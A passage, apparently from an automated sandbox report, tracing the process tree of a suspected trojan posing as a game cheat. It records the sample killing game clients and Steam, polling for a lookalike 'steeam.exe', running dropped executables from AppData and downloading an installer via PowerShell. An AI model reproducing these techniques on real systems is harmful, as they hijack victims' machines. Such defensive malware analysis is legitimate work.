PID:3740

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:800

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:4948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
PID:3484

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:4712

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:3316

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:4816

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
5⤵
PID:448

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
5⤵
- Kills process with taskkill
PID:3248

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:2420

C:\Windows\system32\find.exe
find /i "dota2.exe"
5⤵
PID:2888

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
5⤵
- Kills process with taskkill
PID:4796

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:1472

C:\Windows\system32\find.exe
find /i "cs2.exe"
5⤵
PID:4760

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
5⤵
- Kills process with taskkill
PID:840

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:4740

C:\Windows\system32\find.exe
find /i "RustClient.exe"
5⤵
PID:4448

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
5⤵
- Kills process with taskkill
PID:2576

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:4360

C:\Windows\system32\find.exe
find /i "GTA5.exe"
5⤵
PID:2092

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
5⤵
- Kills process with taskkill
PID:4348

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:3588

C:\Windows\system32\find.exe
find /i "TslGame.exe"
5⤵
PID:2644

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
5⤵
- Kills process with taskkill
PID:2340

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:4988

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
5⤵
PID:1616

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
5⤵
- Kills process with taskkill
PID:2596

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:1620

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:512

C:\Windows\system32\find.exe
find /i "steam.exe"
5⤵
PID:3296

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
5⤵
- Kills process with taskkill
PID:2020

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:5044

C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
5⤵
PID:2576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:2384

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:3252

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:4476

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4984

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:3136

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:1412

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:1124

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:1852

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:2596

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4532

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:4796

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:4056

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5624

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5636

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5644

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6020

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6036

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6044

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5148

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:4736

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:2608

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4192

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:2448

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:3456

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5312

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5504

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5544

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5744

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5684

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5636

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6020

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6000

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5976

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:3592

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5372

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5240

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:3000

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:1928

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5528

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:832

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5640

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5688

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5892

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5876

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5900

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:2652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5400

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:908

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5408

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5696

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5848

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5812

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5892

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6016

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5760

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5848

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5500

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5544

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5188

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6000

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5844

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6496

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6532

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6576

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:1232

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6920

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5828

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4316

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6320

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6792

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:1232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5656

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6792

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6364

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5268

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6544

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5244

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6296

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5244

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7048

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6364

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6912

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6812

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6016

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6996

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6364

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4540

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5308

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5320

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7144

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6440

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6724

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6440

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6216

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6016

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6216

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5728

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:636

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:2612

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6416

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6788

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:3456

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5892

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7616

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:4984

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7836

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:8000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7752

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7244

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7952

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7732

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7812

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6032

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7964

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7548

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7416

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7256

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6216

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7808

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7724

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6708

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6496

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5388

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5416

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7144

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7480

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7980

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8072

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7268

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7824

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:1252

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5180

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7068

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7196

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:460

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7704

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6052

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7348

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5800

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7540

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6916

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7404

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7264

C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh1.exe
"C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh1.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1412

C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh2.exe
"C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh2.exe"
3⤵
- Executes dropped EXE
PID:680

C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh3.exe
"C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh3.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:4808

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1291.tmp\1292.tmp\1293.bat C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh3.exe"
4⤵
PID:3100

C:\Windows\system32\where.exe
where node
5⤵
PID:3752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3624

C:\Users\Admin\Downloads\RedEngine\RedEngine.exe
"C:\Users\Admin\Downloads\RedEngine\RedEngine.exe"
1⤵
PID:552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
